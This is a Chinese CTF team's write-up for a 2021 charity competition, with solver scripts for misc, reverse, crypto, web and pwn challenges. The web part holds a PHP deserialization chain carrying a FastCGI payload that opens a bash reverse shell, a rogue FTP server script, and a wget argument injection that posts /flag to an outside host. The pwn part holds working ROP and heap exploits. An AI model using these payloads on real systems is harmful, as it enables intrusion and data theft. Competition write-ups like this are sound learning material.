2021陇原战疫WP

在看到该比赛为公益比赛,获胜者可为甘肃疫情地区提供援助物资时,我们决定以 n03tAck 战队名义参加比赛

安全人员除了技术上的追求,更是要有人的温情。此次比赛 n03tAck 最后取得第二名的成绩,成功为甘肃疫情地区捐赠 5000 元疫情物资,爱是桥梁,大爱无疆,希望我们都是一位有温度的安全爱好者。诚愿疫情早日过去

注:打*的是赛后出的

Misc

soEasyCheckin

base32,但有问题,倒数出现了0$,0-->O,$--->S,得到一串hex。
结果hex那里又有问题,具体是出在83¥6988ee这里
根据规律,每6个字节的第1个字节为e,然后把¥替换成e
得到社会主义核心价值观编码,但是还是有个地方是错误的,中间有一段为:和谐斃明平
然后把他那个斃随便改一下,我改的“富强”
解码得到的SET{Qi2Xin1Xie2Li4-Long3Yuan0Zhan4Yi4}
根据拼音,可以知道是Yuan2
所以最终flag为:

SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4}

打败病毒

游戏打开之后发现在末地,打完末影龙后没有反应,flag藏在终末之诗里,于是直接去找文本
在.minecraft/version/陇原战“疫”.jar下
将其改为zip,找到assets/minecraft/texts/end.txt,得到11F9sACbBBBWKTiClYDtNF2yIEfThXdfIGPxF
base62解码即可

SETCTF{Fi9ht1ng_3ItH_V1rUs}

SOS

拨号音,踩正确的来组合出flag
用手机录音,然后m4a格式转wav格式,之后DTMF,因为录的总有问题,所以一共录了三次


前面都没出现8,这次终于出现了8,所以应该是6830AB1C75,得到flag

EasySteg

哥哥球球了别套了再套下去套神都哭了呜呜呜

JK为单图盲水印(java),用imagein也行的

然后在flag.rar的注释里面有一串tab和space组成的密文,space转0,tab转1

然后解压,在flag.png的末尾有另一个png,那个png明显有flag字样,用stegsolve反一下色即可看清

flag{156cca8e

然后还在这个图片后面发现了明显的oursecret的特征,结合上面的base64(-b81b-)

得到oursecret的密码为LWI4MWIt

除了数字以外,没有重复字符,里面还有{},结合01串,得出为哈夫曼编码,利用红明谷的脚本即可解码

对应关系看脚本即可理解

import copy
import re

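def dfs(c, d, bits=None):
    """Build the Huffman code described by ``c`` and decode a bit string with it.

    The original recursed once per merge; this version loops, but keeps the
    exact node-selection rule, because the resulting code table depends on it:
    the two lightest nodes are picked with strict ``<`` while scanning the keys
    in dict insertion order (earlier keys win ties), and the merged node is
    appended at the end of the dict.

    Args:
        c: symbol -> weight.  Symbols are single characters; a merged node is
           keyed by the concatenation of the symbols it contains, so every
           symbol must occur exactly once.
        d: symbol -> code so far (normally every value is '').  Bits are
           prepended as nodes merge.
        bits: '0'/'1' string to decode.  Defaults to the challenge ciphertext;
              the page shows that literal wrapped over two lines, here it is
              reassembled into one string.

    Returns:
        The decoded text.  It is also printed, as the original script did.
        Trailing bits that do not complete a codeword are dropped silently
        (original behaviour).

    Note: the caller's dicts are not modified; work is done on copies.
    """
    if bits is None:
        bits = (
            '111011111100010000111100001101000110111110011010001111011110001010011111011100110111110001100011111111110101110001111110011100001101000111101001101111100111011110001000011100111001111011100011111110011101111101101110101111011111010110110110100011010101110101111111101111011110110111010111101001101011010001110010001101010111101011111011011011110001101011101011111011011011100100101101111010011101011111101011111101111011110100111101011111011110101110010011110010101101110111011111100101011010010011011111001111100110100011111011100101100111000011100001111000011011111001100001110000110110011010001110000111111001111000011011001101000111001110110000111011000100111111111001011001101000111101111011001001101111100000111110001001000100111110111011011111110110100100100101101110111110110110111100110100101101111110011111011011011011011111011101011011101111001111101101101101000011011111100111111011110011101011111001101001101111010100110111011110011011011110100110101110101111100110111101110110101011101011111100111111011101011011011010100110101111110100110100011101001011100001001100111011111011110110111110110111011101011010010110110110101101011111110111100111011111111001101011010010110111101101110110011100100000111100110010010101100000011110010101100100010110010000001100101100100100000111100110010010101100000011110010101100101111111100101000101000101001000001111001100100101011000000111100101011001000101100101000101000011110010000011110011001001010110000001111001010110010101001010110010101001000001111001100100101011000000111100101011001001100100101011000001101111100100000111100110010010101100000011110010100010100011011111001000000110010101001000001111001100100101001010110000001111001010110010001000100100001111111000101001000001111001100100101011000000111100101011001011111111001010001011000100010010000011110011001001010110000001111001010001010001101111100100000011001010100100000111100110010010101100000011110010101100100110010010101100000110111110010000011110011001001010110000001111'
            '0010101100100010110010000001100101100100100000111100110010010101100000011110010100010100010100101011000001101111100100000111100110010010101100000011110010100101011001000101100100000011001011001001000001111001100100101011000000111100101011001011111111001010001010001010010000011110011001001010110000001111001010110010001000100100001111111000101001000001111001100100101011000000111100101011001000101100100000011001011001001000001111001100100101011000000111100101011001010100100000011001011111111001000001111001100100101011000000111100101011001000101100100000011001011001001000001111001100100101011000000111100101011001000100010010100100001111111000101001000001111001100100101011000000111100101011001010100100000011001011111111001000001111001100100101011000000111100101000101000101001010110000011011111001000001111001100100101011000000111100101000101000110111110010000001100000011110010000011110011001001010110000001111001010001010000001001010001010000111111011010011110011101011111011100001011010110101111010001111100110111110101111110110101010011101111101100100000101111011010111101101101110011001110001100011111001110010000010111100010111101111111101101101110000111010000101111110001100000110001110010100100000110000101110000100010110111100000101110011111110000111011010111101001101001101111101000100101111101101011111100111111001110001100001000011011111000001111100010011001110111101111111011111001000111000011101101110000111011011110011101111111011011010110100011111000100101111111011100000100000101110010111100011010110100011111101111001110101111010111011011100100110011101111100111101111100000001001001101001101111111101101011110111011110011101001101111010100110111011101011110011100000011010010111111000100110011101111101011110111110111'
        )

    weights = dict(c)
    codes = dict(d)

    # --- tree construction: merge the two lightest nodes until one remains ---
    while len(weights) > 1:
        keys = list(weights)
        k0, k1 = keys[0], keys[1]
        if weights[k0] > weights[k1]:
            k0, k1 = k1, k0
        # k0 is the lightest seen so far, k1 the second lightest; strict '<'
        # keeps the earliest key on ties, exactly like the original scan.
        for k in keys[2:]:
            if weights[k] < weights[k1]:
                if weights[k] < weights[k0]:
                    k0, k1 = k, k0
                else:
                    k1 = k
        for sym in k0:
            codes[sym] = '0' + codes[sym]
        for sym in k1:
            codes[sym] = '1' + codes[sym]
        weights[k0 + k1] = weights[k0] + weights[k1]
        del weights[k0]
        del weights[k1]

    # --- decoding: longest-prefix-free match, shortest codeword first ---
    by_code = {code: sym for sym, code in codes.items()}
    out = []
    n = len(bits)
    st = 0
    while st < n:
        ed = st + 1
        while ed <= n:
            sym = by_code.get(bits[st:ed])
            if sym is not None:
                out.append(sym)
                break
            ed += 1
        if ed > n:
            # no codeword matched the remaining bits; stop, as the original did
            break
        st = ed

    text = ''.join(out)
    print(text)
    return text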

# Symbol frequencies counted from the recovered text.  Insertion order is part
# of the input: dfs() breaks ties by it, so this literal must not be reordered.
c = {'n':9,'S':2,'B':3,'I':6,'U':6,'L':1,'O':3,'R':2,'F':3,'Y':1,'G':2,'H':3,'v':9,'N':2,'M':1,'Z':1,'D':6,'T':1,'h':18,'o':16,'u':17,'b':9,'s':7,'r':4,'g':8,'f':10,'a':14,'m':2,'i':20,'p':2,'e':14,'w':7,'q':2,'y':8,'P':1,'J':2,'E':2,'C':1,'V':1,'A':1,'j':4,'k':5,'x':5,'t':3,'c':6,'8':24,'9':56,'{':1,'3':217,'d':97,'4':83,'6':54,'0':25,'1':12,'2':10,'5':8,'7':10,'}':1,'l':4,'Q':1,'W':1,'z':1}
# Every symbol starts with an empty codeword; dfs() prepends bits as it merges.
d = dict.fromkeys(c, '')
# Copies are passed so that the literals above stay untouched for re-runs.
dfs(copy.deepcopy(c), copy.deepcopy(d))

#nSBIULORFYGHvNMIOUZSDTNhnoubuosrgfbouvasmruiohauiopewgvfbwuivpqynqwUPIFJDDBUEDUIDHBUIDCVHJIOAejikxneiwkyiohwehiooiuyhiosehfhuiaetyhovauieyrghfuotgvac89xcboiyuweagihniaweo{3d46303d39463d39383d41393d46303d39463d39323d38433d46303d39463d39383d38463d46303d39463d39333d39333d46303d39463d39303d39453d46303d39463d38453d41333d46303d3d39463d39373d42433d46303d39463d39323d38373d46303d39463d38453d41333d46303d39463d39303d39453d46303d39463d39383d41393d46303d39463d38433d39453d46303d39463d3d39383d41393d46303d39463d39323d38433d46303d39463d39373d42433d46303d39463d39383d41393d46303d39463d39333d41323d46303d39463d39383d41393d46303d39463d39373d3d42433d46303d39463d39333d41323d46303d39463d38433d39453d46303d39463d38453d41463d46303d39463d38443d3846}huilagsieufrcb78QWEGF678Rniolsdf149687189735489246avaeukighf6497ejixcnbmlolohnbasik2647893hasfhuvzxchbjkaefgyhuetyuhjadfxcvbn

{}里面的内容拿去hex,发现是Quoted Printable,但是有些地方出现了两次==,于是将其重复的删掉,得到

😩💌😏📓🐞🎣🗼💇🎣🐞😩🌞😩💌🗼😩📢😩🗼📢🌞🎯🍏

不是base100,所以拿去试试国外的一种,以前做la佬的ctfshow月饼杯_共婵娟用到的

https://github.com/pavelvodrazka/ctf-writeups/tree/master/hackyeaster2018/challenges/egg17

拼接起来,得到flag

flag{156cca8e-b81b-4157-9f39-4c41f4a4facb}

*ez_misc

hint是零宽,说的是和piet很像的一种esolang,然后结合ctfshow6月赛八神的babyLSBwithHelicopter

可以知道是brainloller

然后010打开,提示解出来是后面steghide的密码,并且CRC报错,用爆CRC的脚本一爆就发现正确宽度为14,高为12

用bftools解,bftools.exe decode brainloller bf.png,得到的bf再去解码得到密码Hello Worl

但是解不出来,于是用我6月赛写的脚本去解https://blog.csdn.net/qq_42880719/article/details/117479024

解出来是Hello Worle!,我猜是Hello World!

结合题目新上的hint,得到的密码我试过有

Hello Worl
Hello_Worl
Hello Worle!
Hello_Worle!
Hello World!
Hello_World!
Hello World
Hello_World

可惜都不对,通过出题人的朋友问了下出题人,他朋友也表示解不出来,但是出题人是能解出来的(好像用的是本地的附件)
所以我总感觉是比赛题目附件的问题?

—17:02—:经过一个半小时的积极反馈

把bftools.exe解出来的结果中的空格替换为下划线,用Hello_Worl解steghide,得到一个文本
后面是一个熊曰,然后就完事

Re

EasyRe

flag就在常量里面。。

flag{fc5e038d38a57032085441e7fe7010b0}

findme

发现判断长度为26位

tls,找到主逻辑,发现是一个没有魔改的rc4.
那当然是利用它流密码的性质做。我们输入26个0,得到对应的密文,再异或得到密钥流,再异或要比对的密文,即可得到flag

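# Ciphertext the binary compares against (the encrypted flag).
s = [0xD4, 0x27, 0xE1, 0xB2, 0xF4, 0x9F, 0x4C, 0xDC, 0xBC, 0x1B,
     0x80, 0xD2, 0x44, 0x8B, 0xEA, 0x33, 0x02, 0x4E, 0x41, 0xEB,
     0x8D, 0x23, 0x6F, 0xBC, 0x00, 0x8B]
# Chosen plaintext fed to the binary: 26 ASCII zeros (same value as the original literal).
d = '0' * 26
# Ciphertext the binary produced for that chosen plaintext, dumped as
# sign-extended 32-bit ints; only the low byte is meaningful.
a = [0xFFFFFFB7, 0x00000052, 0xFFFFFF85, 0xFFFFFFC1, 0xFFFFFF90, 0xFFFFFFE9, 0x00000007, 0xFFFFFFB8, 0xFFFFFFE4, 0x0000001A, 0xFFFFFFC3, 0xFFFFFFBD, 0x0000001D, 0xFFFFFF8E, 0xFFFFFF85, 0x00000046, 0x00000000, 0x00000021, 0x00000044, 0xFFFFFFAF, 0xFFFFFFEF, 0x00000070, 0x00000032, 0xFFFFFFB5, 0x00000011, 0xFFFFFFC6]


def recover_plaintext(target, chosen_plain, chosen_cipher):
    """Undo a stream cipher using a known plaintext/ciphertext pair.

    keystream = chosen_plain XOR chosen_cipher, so target XOR keystream is the
    plaintext of ``target`` (the same keystream is reused for every run,
    which is the weakness the write-up exploits).

    Args:
        target: ciphertext bytes (ints) to recover.
        chosen_plain: the plaintext string that was encrypted.
        chosen_cipher: its ciphertext as ints; values are masked to one byte
            because the dump is sign-extended.

    Returns:
        The recovered plaintext as a str.

    Raises:
        ValueError: if the three inputs are not the same length (a silent
            truncation here would hide a copy/paste mistake).
    """
    if not (len(target) == len(chosen_plain) == len(chosen_cipher)):
        raise ValueError("target, chosen_plain and chosen_cipher must have equal length")
    return ''.join(
        chr(t ^ ord(p) ^ (k & 0xFF))
        for t, p, k in zip(target, chosen_plain, chosen_cipher)
    )


print(recover_plaintext(s, d, a), end='')
#SETCTF{Th1s_i5_E2_5tRcm9!}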

arm

打开入眼就是sbox,然后最下面主函数那里出现了很多aes,然后也看到了key,然后发现是cbc模式?但是解密出来前16位是对的,然后尝试ecb模式,直接得到flag

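from Crypto.Cipher import AES

# Key recovered from the binary (16 bytes -> AES-128).
key = b'this_is_a_key!!!'
# 32-byte ciphertext as pasted from the disassembly.  The original called
# long_to_bytes() without importing it; bytes.fromhex() gives the same 32
# bytes (leading digit is non-zero, so no length difference) with no extra import.
enc = bytes.fromhex('1030a9254d44937bed312da03d2db9adbec5762c2eca7b5853e489d2a140427b')
# ECB, not CBC: the write-up notes CBC only decrypted the first block correctly.
ae = AES.new(key, AES.MODE_ECB)
print(ae.decrypt(enc))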

easyre++

花指令去掉,我全部nop了,发现还差v4,于是在nop之前下断得到v4的值
v4=[0x271E150C, 0x3B322920, 0x5F564D44, 0x736A6158, 0x978E857C, 0xABA29990, 0xCFC6BDB4, 0xE3DAD1C8]

直接z3

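# Constant table read from the binary at a breakpoint (see above).
v4 = [0x271E150C, 0x3B322920, 0x5F564D44, 0x736A6158, 0x978E857C, 0xABA29990, 0xCFC6BDB4, 0xE3DAD1C8]
# Expected output the binary compares the transformed input against.
en = [0xEEE8B042, 0x57D0EE6C, 0xF3F54B32, 0xD3F0B7D6, 0x0A61C389, 0x38C7BA40, 0x0C3D9E2C, 0xD64A9284]

from z3 import *

s = Solver()
# Eight unknown 32-bit words of input; 32-bit BitVecs make '<<' wrap like the C code.
a = [BitVec(f'a[{i}]', 32) for i in range(8)]
v5 = [a[i] ^ v4[(7 * i + 2) % 8] for i in range(8)]
# Mirror of the binary's mixing loop.  Statement order matters: v5[(5*j+3)%8]
# may already have been rewritten in an earlier iteration.
for j in range(8):
    v5[j] ^= (v5[j] << 7)
    v5[j] ^= v4[(7 * j + 3) % 8]
    v5[j] ^= v5[(5 * j + 3) % 8]
    v5[j] ^= (v5[j] << 13)
    v5[j] ^= v4[(7 * j + 5) % 8]
    v5[j] ^= (v5[j] << 17)
for i in range(8):
    s.add(v5[i] == en[i])
print(s.check())  # expected: sat
m = s.model()

# Each solved word is a little-endian 32-bit value; fixed-width to_bytes
# replaces long_to_bytes(...)[::-1], which would drop a zero high byte.
d = b''
for i in range(8):
    d += m[a[i]].as_long().to_bytes(4, 'little')
print(d)
#b'bd6a64f17bb3dc065b41a0aad1e48e98'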

*Eat_something

wasm逆向。

另存为本地文件,发现是base64编码的,解码一下,然后保存为

wasm.wasm,然后用wasm2c 反编译成 c文件,然后再编译.c文件,

首先看到check函数入口

然后用ida打开,找到对应函数

结合动调,发现就是一个简单的异或

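# Bytes the wasm check() compares against (taken from the decompiled C).
s = [0x86, 0x8B, 0xAA, 0x85, 0xAC, 0x89, 0xF0, 0xAF, 0xD8, 0x69,
     0xD6, 0xDD, 0xB2, 0xBF, 0x6E, 0xE5, 0xAE, 0x99, 0xCC, 0xD5,
     0xBC, 0x8B, 0xF2, 0x7D, 0x7A, 0xE3]


def decode(data):
    """Invert the check: XOR each byte with its index, then halve it.

    The write-up only calls the transform "a simple XOR"; the integer halving
    reverses whatever doubling the module applied first — TODO confirm against
    the wasm2c output.  Returns the decoded str ('' for empty input).
    """
    return ''.join(chr((b ^ i) // 2) for i, b in enumerate(data))


print(decode(s), end='')
#CETCTF{Th0nk_Y0u_DocTOr51}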

Crypto

mostlycommom

签到rsa,首先共模攻击,但是e1,e2不互素,公因数只有一个2,所以直接尝试开方就出了。

from gmpy2 import *
from Crypto.Util.number import *

def modulus(n,e1,e2,c1,c2):

_,s,t = gcdext(e1, e2)
m = (pow(c1,s,n) * pow(c2 , t , n)) % n
print(long_to_bytes((iroot(m,2)[0])))

# Challenge parameters: one modulus, two ciphertexts of the same message.
N = 122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
c1 = 39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2 = 43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277
e1, e2 = 65536, 270270
# Prints 2: the exponents share a factor, so the attack yields m**2, not m.
print(gcd(e1, e2))
modulus(N, e1, e2, c1, c2)
#SETCTF{now_you_master_common_mode_attack}

give cat for Prince

CBC模式,需要我们构造密文,给了iv,并且我们每次利用系统解密都可以自己选择iv,所以其实就很简单了,一个CBC的构造

from gmpy2  import *
from hashlib import *
from Crypto.Util.number import *
from pwn import *
import string

p = remote('node4.buuoj.cn', 29764)  # challenge service instance used during the event
table = string.ascii_letters + string.digits  # candidate characters for the proof-of-work prefix
context.log_level = 'debug'  # pwntools: echo every byte sent/received

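def pow_of_work(end, sha, alphabet=None):
    """Solve the service's proof-of-work: find XXXX with sha256(XXXX + end) == sha.

    Candidates are tried in the same order as the original four nested loops
    (itertools.product over ``alphabet`` with repeat=4).

    Args:
        end: the 8-character suffix the service printed.
        sha: expected hex digest.
        alphabet: characters tried at each position; defaults to ASCII letters
            and digits, i.e. the script's module-level ``table``, so the
            function no longer depends on that global.

    Returns:
        The 4-character prefix, or None when nothing matches.
    """
    import itertools
    import string
    from hashlib import sha256

    if alphabet is None:
        alphabet = string.ascii_letters + string.digits
    suffix = end.encode()
    for combo in itertools.product(alphabet, repeat=4):
        prefix = ''.join(combo)
        if sha256(prefix.encode() + suffix).hexdigest() == sha:
            return prefix
    return None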
# --- proof-of-work handshake: the service prints sha256(XXXX+<8 chars>) == <hex> ---
p.recvuntil('[+] sha256(XXXX+')
end = p.recv(8).decode()
p.recvuntil(') == ')
sha = p.recvuntil('\n')[:-1].decode()
xxxx = pow_of_work(end, sha)
p.recvuntil('[+] Give Me XXXX :')
p.sendline(xxxx)
# --- register a 16-byte name (exactly one AES block) and collect the IV and the encrypted permission ---
name = b'dbty' * 4
premission = b'Princepermission'  # 16 bytes; defined but unused below, the literal is repeated at the strxor
p.recvuntil('2.Go away')
p.sendline('1')
p.sendline('dbty' * 4)
p.recvuntil('Miao~ ')
iv = p.recvuntil('\n')[:-1]  # IV as the service prints it (presumably raw bytes — confirm against the server)
p.recvuntil('3.say Goodbye')
p.sendline('1')
p.recvuntil('Permission:')
enc = p.recvuntil('\n')[:-1]  # ciphertext of name || permission, two blocks
print(enc.hex())

from Crypto.Util.strxor import *  # mid-script import kept as written; provides strxor()

# --- round 1: learn D(C2) ---
# Ciphertext submitted is [iv, enc block 2] decrypted with IV = iv, so in CBC
# the second plaintext block is D(C2) XOR iv.
p.sendline('2')
p.recvuntil('Looks like you want to know something. Give me your permission:')
p.sendline(iv + enc[16:])
p.recvuntil('Miao~ ')
p.sendline(iv)
p.recvuntil('The message is ')
plain = p.recvuntil('\n')[:-1]

print(plain)
dec_c2 = strxor(iv, plain[16:])           # = D(C2)
c1 = strxor(b'Princepermission', dec_c2)  # block preceding C2 that makes C2 decrypt to this string


# --- round 2: learn D(c1) the same way, using c1 as the first ciphertext block ---
p.sendline('2')
p.recvuntil('Looks like you want to know something. Give me your permission:')
p.recvuntil('[-] ')  # prompt marker printed by the service before reading input
p.sendline(c1 + enc[16:])
p.recvuntil('Miao~ ')
p.recvuntil('[-] ')
p.sendline(iv)
p.recvuntil('The message is ')

plain = p.recvuntil('\n')[:-1]
print(plain)
dec_c1 = strxor(iv, plain[:16])  # = D(c1)
ivv = strxor(dec_c1, name)       # IV under which c1 decrypts to the registered name

# --- final: [c1, C2] with IV ivv decrypts to name || Princepermission ---
#p.recvuntil('Give me your permission:')
p.recvuntil('[-] ')
p.sendline(c1 + enc[16:])
#p.recvuntil('What\'s the cat tell you?')
p.recvuntil('[-] ')
p.sendline(ivv)
p.recvall()

easytask

一看就是原题,上谷歌搜到个轮子直接梭掉了 https://hxp.io/blog/26/VolgaCTF-2016-Quals-crypto300-XXY-writeup/

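from sage.modules.free_module_integer import IntegerLattice
# These three were used below but never imported in the original.
import hashlib
from binascii import unhexlify
from Crypto.Cipher import AES

# Public matrix rows, pasted in the bracketed form the challenge printed them.
w = ['[-10150241248 -11679953514 -8802490385 -12260198788 -10290571893 -334269043 -11669932300 -2158827458 -7021995]',
     '[ 52255960212 48054224859 28230779201 43264260760 20836572799 8191198018 14000400181 4370731005 14251110]',
     '[ 2274129180 -1678741826 -1009050115 1858488045 978763435 4717368685 -561197285 -1999440633 -6540190]',
     '[ 45454841384 34351838833 19058600591 39744104894 21481706222 14785555279 13193105539 2306952916 7501297]',
     '[-16804706629 -13041485360 -8292982763 -16801260566 -9211427035 -4808377155 -6530124040 -2572433293 -8393737]',
     '[ 28223439540 19293284310 5217202426 27179839904 23182044384 10788207024 18495479452 4007452688 13046387]',
     '[ 968256091 -1507028552 1677187853 8685590653 9696793863 2942265602 10534454095 2668834317 8694828]',
     '[ 33556338459 26577210571 16558795385 28327066095 10684900266 9113388576 2446282316 -173705548 -577070]',
     '[ 35404775180 32321129676 15071970630 24947264815 14402999486 5857384379 10620159241 2408185012 7841686]']


def parse_row(text):
    """Turn a pasted '[a b c ...]' string into a list of ints."""
    return [int(tok) for tok in text[1:-1].split()]


W = matrix([parse_row(row) for row in w])

e_ints = parse_row('[151991736758354 115130361237591 58905390613532 130965235357066 74614897867998 48099459442369 45894485782943 7933340009592 25794185638]')
print(e_ints)
e = matrix(e_ints)

# Embedding taken from the hxp write-up linked above: stack e under W and add
# a flag column, then look for the shortest vector of that lattice.
B = W.stack(e).augment(vector([0] * W.ncols() + [1]))
d = IntegerLattice(B).shortest_vector()
print('d = {}'.format(d))

# Error vector pasted from that run (presumably after fixing the sign) so the
# rest is reproducible; the original hard-coded e - d by hand, it is derived here.
d = vector([-3, -2, -3, 0, -3, 2, 2, 0, 2])
target = [ei - di for ei, di in zip(e_ints, d)]
m = W.solve_left(vector(target))
print('m = {}'.format(m))

# Solution pasted as a plain Python list: the key is sha256 of str(M), and a
# Sage vector would print with parentheses and change the hash input.
M = [877, 619, 919, 977, 541, 941, 947, 1031, 821]
key = hashlib.sha256(str(M).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
c = unhexlify('1070260d8986d5e3c4b7e672a6f1ef2c185c7fff682f99cc4a8e49cfce168aa0')
print(cipher.decrypt(c))
#flag{be5152d04a49234a251956a32b}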

Web

eaaasyphp

原题改编,在 Geek Challenge 2021中有

<?php

class Check {
    // Two process-wide gates; both start closed and are only opened by the
    // magic methods of the classes below (Esle::__wakeup, Welcome::__invoke).
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    // Runs automatically when an Esle instance is unserialized, so any payload
    // that merely contains one opens the first gate.
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    // Deserialization overwrites the property with a non-empty string, so an
    // unserialized Hint does not reach the call in __destruct on its own.
    public function __wakeup(){
        $this->hint = "no hint";
    }

    // Calls the string in $this->hint as a function when the property is
    // empty/unset; only reachable when __wakeup did not run.
    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}


class Bunny {

    // Arbitrary-write sink: target path and content both come from the
    // deserialized object (or, for data, from the request), and it fires on
    // any string conversion of a Bunny once Check::$str2 has been opened.
    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            // file_put_contents() accepts stream wrappers, so the path is not
            // limited to the local filesystem (the write-up uses ftp://).
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    // Opens the second gate, then the concatenation converts $this->username
    // to a string — that is what triggers Bunny::__toString when username is a Bunny.
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    // At destruction, calls whatever $this->str4 holds (an object with
    // __invoke works) provided the first gate is open.
    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            throw new Error("Error");
        }
    }
}

// Root cause: unserialize() on a request parameter lets the caller instantiate
// any declared class and chain the magic methods above.  The fix is not to
// deserialize untrusted input (use a data-only format such as json_decode), or
// at minimum unserialize($data, ['allowed_classes' => false]).
if (isset($_GET['code'])) {
    unserialize($_GET['code']);
} else {
    highlight_file(__FILE__);
}

这里设置了两个 static 变量,所以得先让它们为 true 才能继续进行,逻辑很清楚,最终构造的POP链

<?php

class Esle
{
}

class Hint
{
public function __construct()
{
$this->hint = "phpinfo";
}
}


class Bunny
{
public function __construct()
{
$this->filename = "ftp://bbb@xxx:23/aaa";
$this->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/xxxxx/5000%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");
}
}

class Welcome
{
public function __construct()
{
$this->username = new Bunny();
}
}

class Bypass
{

public function __construct()
{
$this->str4 = new Welcome();
}
}
echo urlencode(serialize(array(new Esle(), new Bypass())));

之前试过直接写还有各种方法,估计是没有权限根本写不上,但是还可以利用FTP - SSRF 来攻击 FPM/FastCGI造成命令执行
参考文章: 浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法
首先使用 gopherus 生成payload:

然后在VPS上放置一个py脚本

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

运行脚本,并多开一个终端开启监听,然后发送payload

vps上收到反弹shell

*CheckIN

审计源码


wget 路由存在参数注入,构造payload

http://b6cd46d7-79b1-4321-9cb9-94a9ad7f216d.node4.buuoj.cn:81/wget?argv=dotast&argv=--post-file&argv=/flag&argv=http://ip:port/

然后远程vps监听端口

发送请求后,vps收到flag

Pwn

pwn1

给了任意写和栈溢出,先用任意写改__stack_chk_fail的got表为puts的plt,实现canary绕过,再直接ROP就行了。

from pwn import *

p=process('./pwn1')
#p=remote('node4.buuoj.cn',27412)
elf=ELF('./pwn1')
context.log_level='debug'
#libc=ELF('libc-2.23.so')
libc=elf.libc
rdi=0x0000000000400a03

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40090b))
p.sendlineafter('your choice\n','-1')
puts=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
success('puts:'+hex(puts))
libc_base=puts-libc.sym['puts']
success('libc_base:'+hex(libc_base))

sh=libc_base+libc.search('/bin/sh').next()
system=libc_base+libc.sym['system']

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(0x00000000004005d9)+p64(rdi)+p64(sh)+p64(system))
p.sendlineafter('your choice\n','-1')
p.interactive()

pwn2

有uaf漏洞,直接打__malloc_hook+onegadget就行了。

from pwn import *

p=remote('node4.buuoj.cn',29868)
libc=ELF('/home/root2/Desktop/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
context.log_level='debug'

def add(id):
p.sendafter('Input your choice: \n','1\n1\n')
p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')

def edit(id,con):
p.sendafter('Input your choice: \n','2\n2\n')
p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')
p.sendafter('Input the Magic\n',str(con))

def delete(id):
p.sendafter('Input your choice: \n','3\n3\n')
p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')

add(0)
add(1)
edit(0,'a')
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x7f1df4510d61+0x7f1df414c000
success('libc_base:'+hex(libc_base))

delete(0)
edit(0,p64(libc_base+libc.sym['__malloc_hook']-0x23))

add(0)
add(1)
edit(1,'a'*0x13+p64(libc_base+0xf03a4))

add(0)
#gdb.attach(p)
p.interactive()
作者

n03tAck
